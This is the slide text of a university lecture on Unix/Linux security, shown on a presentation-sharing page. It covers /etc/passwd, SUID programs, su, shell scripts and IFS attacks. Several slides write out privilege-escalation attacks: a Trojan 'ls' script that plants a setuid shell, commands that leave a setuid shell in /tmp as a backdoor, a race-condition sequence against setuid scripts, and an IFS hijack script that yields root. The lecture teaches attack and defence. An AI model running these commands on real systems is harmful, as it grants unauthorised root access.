1 The Attack and Defense of Computers Dr. 許 富 皓. 2 Passwords in Unix/Linux Systems.

Slides:



Advertisements
Similar presentations
Linux Users and Groups Management
Advertisements

Pre-Assessment Questions
Unix Refresher This presentation is an amalgam of presentations by Mark Michael, Randy Marchany and Ed Skoudis. I have edited and added material. Dr. Stephen.
Linux+ Guide to Linux Certification, Second Edition
More Shell Basics CS465 - Unix. Unix shells User’s default shell - specified in /etc/passwd file To show which shell you are currently using: $ echo $SHELL.
Guide To UNIX Using Linux Third Edition
Unix Systems Administration 1Y. K. Chang root: the super user 4 The UNIX semigod who can perform privileged tasks: controlling processes, adding devices,
Linux File Security. What is Permission ? Specifies what right are granting to users to access the resources available in the computer. So that important.
Linux Commands LINUX COMMANDS.
L INUX C OMMAND L INE I NTERFACE G UNAANBAN.G
1. This presentation covers :  User Interface Administration  Files System and Services Management 2.
O.S security Ge Zhang Karlstad University. Outline Why O.S. security is important? Security schemes in Unix/Linux system Security schemes in windows system.
The file structure and related utilities CS240 Computer Science II.
Unix Primer. Unix Shell The shell is a command programming language that provides an interface to the UNIX operating system. The shell is a “regular”
Lesson 7-Creating and Changing Directories. Overview Using directories to create order. Managing files in directories. Using pathnames to manage files.
Chapter 9 Part II Linux Command Line Access to Linux Authenticated login using a Linux account is required to access a Linux system. The Linux prompt will.
Introduction to Shell Script Programming
Unix System Administration Rootly Powers Chapter 3.
Agenda User Profile File (.profile) –Keyword Shell Variables Linux (Unix) filters –Purpose –Commands: grep, sort, awk cut, tr, wc, spell.
An Introduction to Unix Shell Scripting
File Permissions. What are the three categories of users that apply to file permissions? Owner (or user) Group All others (public, world, others)
Linux+ Guide to Linux Certification, Second Edition
Adding New Users User as an entity - username(UID), GID. UID - typically a number for system to identify the user. GID – a number that recognizes a set.
IT2204: Systems Administration I 1 6b). Introduction to Linux.
INTRODUCTION TO LINUX Jacob Chan. GNU/Linux Consists of Linux kernel, GNU utilities, and open source and commercial applications Works like Unix –Multi-user.
UNIX/LINUX Shells Shell is an UNIX/LINUX command interpreter. Shell command can be internal or external. The code to execute an internal command is part.
ITI-481: Unix Administration Meeting 3 Christopher Uriarte, Instructor Rutgers University Center for Applied Computing Technologies.
Lesson 9-Setting and Using Permissions. Overview Describing file permissions. Using execute permissions with a file. Changing file permissions using mnemonics.
1 Operating Systems Lecture 2 UNIX and Shell Scripts.
Users Greg Porter V1.0, 26 Jan 09. What is a user? Users “own” files and directories Permission based on “ownership” Every user has a User ID (UID) 
There are three types of users in linux  System users: ?  Super user: ?  Normal users: ?
Managing Users  Each system has two kinds of users:  Superuser (root)  Regular user  Each user has his own username, password, and permissions that.
Unix/Linux cs3353. The Shell The shell is a program that acts as the interface between the user and the kernel. –The shell is fully programmable and will.
BIF713 Basic Unix/Linux Commands Getting Help with Commands.
ITR3 lecture 6: intoduction to UNIX Thomas Krichel
Chapter 3 & 6 Root Status and users File Ownership Every file has a owner and group –These give read,write, and execute priv’s to the owner, group, and.
Agenda Basic Unix Commands (Chapters 2 & 3) Miscellaneous Commands: whereis, which, whoami, finger, passwd, cal, date Working with Files: cat, more, less.
Linux+ Guide to Linux Certification, Third Edition
Linux+ Guide to Linux Certification, Third Edition
User Environments Objectives –to provide appropriate environments for different types of users Contents –different login programs –user profiles –restricted.
Introduction to Programming Using C An Introduction to Operating Systems.
Λειτουργικά Συστήματα – Lab2 Γιάννης Πετράκης. Directory Navigation and Control  The Unix file system is set up like a tree branching out from the root.
Lesson 3-Touring Utilities and System Features. Overview Employing fundamental utilities. Linux terminal sessions. Managing input and output. Using special.
Linux Commands C151 Multi-User Operating Systems.
Environment After log in into the system, a copy of the shell is given to the user Shell maintains an environment which is distinct from one user to another.
Manually Creating a New User Account Presented by Carl South.
SCSC 455 Computer Security Chapter 3 User Security.
Module 1 - Introduction to Linux. Users must log-in Linux is case sensitive File and Directories naming conventions (No spaces!) Files and Directories.
SUSE Linux Enterprise Desktop Administration Chapter 9 Manage Users, Groups, and Permissions.
Lecture 02 File and File system. Topics Describe the layout of a Linux file system Display and set paths Describe the most important files, including.
 Last lesson, the Windows Operating System was discussed along with the Windows command shell  Unix is a computer operating system, that similarly manages.
1 CS3695 – Network Vulnerability Assessment & Risk Mitigation – Introduction to Unix & Linux.
Jozef Goetz, expanded by Jozef Goetz, 2008 Credits: Parts of the slides are based on slides created by UNIX textbook authors, Syed M. Sarwar, Robert.
Karlstad University Operating System security Ge Zhang Karlstad University.
Agenda Customizing a Unix/Linux account Environment Introduction to Start-up Files (.bash_profile,.bashrc,.profile,.kshrc) Safe Methods for Changing Start-up.
INTRODUCTION TO SHELL SCRIPTING By Byamukama Frank
SUSE Linux Enterprise Desktop Administration
Linux 101 Training Module Linux Basics.
System Programming and administration CS 308
Chapter 2 User Management
Unix Access Control Basic CE 2
Unix : Introduction and Commands
The Linux Command Line Chapter 9
Linux Shell Script Programming
The Attack and Defense of Computers
Module 13 System and User Security
Rootly Powers Chapter 3.
Adding New Users.
Chapter 3 The UNIX Shells
Linux Commands LINUX COMMANDS.
Presentation transcript:

1 The Attack and Defense of Computers Dr. 許 富 皓

2 Passwords in Unix/Linux Systems

3 /etc/passwd Format: Racehl: eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:bin/ksh account name encrpyted password uidgid user name home directory login shell

4 System Function Account Unix opens special accounts for a variety of system functions. (e.g. daemon/sys, ftp, nobody, uucp ) Daemon:*:1:1: :/tmp: ftp:*:3:3:FTP User:/usr/sool/ftp: Nobody:*:60001:60001::/tmp: uucp:*:4:4::/usr/spool/uucppublic:/us/lib/uucp/uucico Prevent users from using login to log into the system. (not include trusted host/user; rlogin )

5 Password Crackers Download (1) Download (2) John the Ripper password cracker -- Linux Ophcrack 2 -- Windows

6 One Time Password Password list Small Card Calculator

7 UID, GID, and SUID

8 Account Name and UID UID 0  root. A system identifies a user by her/his UID, not her/his name. e.g. Name: root, UID: 100  no root privilege Name: doggy, UID: 0  root privilege. good habit: user name root should be preserved for system administrators. Users with different user names but with the same UID are treated as the same user by the system.

9 Real UIDs and Effective UIDs A Unix process has at least these two IDs: Real UID: a process owner’s real identity and matches up with the username the owner logged in as. Effective UID: a system decide a process’s privilege based on this ID. Usually, the above two IDs of a process are the same.

10 When a suid program is run, the process involved takes on an efficient UID that is the same as the owner of the file, but the real UID remains the same as the one of the user that creates the process. chmod 4xxx filename e.g. $ chmod 4757 program_name $ ls –al.. -rwsr-xrwx root user Sep program_name setuid or SUID program suid program indicator

11 setuid Program examples su passwd

12 Group Each user belongs to a primary group that is stored in the /etc/passwd file. The /etc/group file contains every group and its gid in a system. vision:*:101:Keith,arlin,janice users:*:100: startrek:*:102:janice,karen,arlin Each user can belong to several different groups, but her/his gid can be the gid of only one of the groups which she/he belongs to. A user can use command newgrp to change her/his gid.

13 su : Substitute User %whoami tim %su john Password: ******* %whomai john ======================================== %su Password:******** # whoami root # super user password new prompt

14 Security Problem with su Type /bin/su - 1) avoid Trojan horse (another program with the same name and in one of the directories listed in the PATH variable.) 2) The access right of the directory that contains the Trojan may not be set correctly. cause the sub-shell to read all relevant startup files and simulate a login; therefore, the new shell uses the root’s environment variable, including PATH.

15 Stealing Superuser Account A Trojan horse shell script with name ls. 1) Change the access right of the user’s home directory so that the victim must use root account to see the content of this directory. 2) Create a file named -f Assume: the root’s PATH variable is as follows:.:xxxxxxx Observation: When going into a directory, the first command a user types usually is ls. %cat ls #! /bin/sh cp /bin/sh./stuff/junk/.superdude chmod 4555./stuff/junk/.superdude rm –f $0 exec /bin/ls ==================================== %cd %chmod 700. %touch./-f

16 Account Steal by Passersby $ cp /bin/sh /tmp/break-acct $ chmod 4755 /tmp/break-acct When a user left her/his terminal unnoticed, then a bystander could create a backdoor easily by just typing the above commands.

17 Shells and Shell Scripts

18 Shell Also called a command line interpreter. When you login a system, it displays a prompt on the screen and waits for you to enter a commend. A running shell is also a process. Some of the famous shells Bourne shell (/bin/sh ) Bourne Again shell (/bin/bash ) Korn Shell (/bin/ksh ) C-shell ( /bin/csh )

19 Shell Script A shell script is series of commands written in plain text file. In order to make a shell script executable, its file permission must be changed to executable. Usually the first line of a shell script is as follows: #! Shell, then followed by a series of commands

20 Two shells are involved in the execution of a shell script. The shell that accepts the shell script command. The shell that executes the shell script. Race Conditon: $ cd /tmp $ ln /etc/setid_script temp $ nice -20 temp & $ mv my_script temp Security Problems of SUID Shell Script Between the time the kernel opens the file to see which interpreter to run, and when the (now-set-id) interpreter turns around and reopens the file to interpret it, an attacker might change the file (directly or via symbolic links). attack script opened twice 1.by kernel 2.by executing shell

21 Solution /dev/fd When the kernel passes the name of the set-id script to open to the interpreter, rather than using a pathname (which would permit the race condition) it instead passes the filename /dev/fd/3.

22 IFS Security

23 IFS Environment Variable The IFS specifies which characters separate commands. It is normally set to a space, tab, or new line.

24 IFS and Shell Script Security By changing the IFS, a hacker can change what programs our script executes. Our script calls the /usr/bin/passwd program. Changing the IFS to "/" with % export IFS='/' causes the script to no longer run /usr/bin/passwd, but instead run usr bin passwd. Now a hacker can create a script called usr that generates a root shell.

25 Security Hole in /usr/lib/preserve 1. telnet 2. disconnect 3. preserve saves the edited file in a restricted area 4. recover program reads the file from the area vi

26 /usr/lib/preserve and /bin/mail preserve was installed SUID root. preserve ran /bin/mail as the root user to alert users that their files had been preserved. preserve executed the mail program with the system() function call. According to the content of IFS to parse a string into command, options, and arguments

27 If IFS =‘/’, then preserve will execute, bin mail instead of /bin/mail. Change IFS to Execute a Different Program/Script % cat bin #! /bin/sh cd /home/mydir/bin cp /bn/sh./sh chown root sh chmod 4755 sh

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.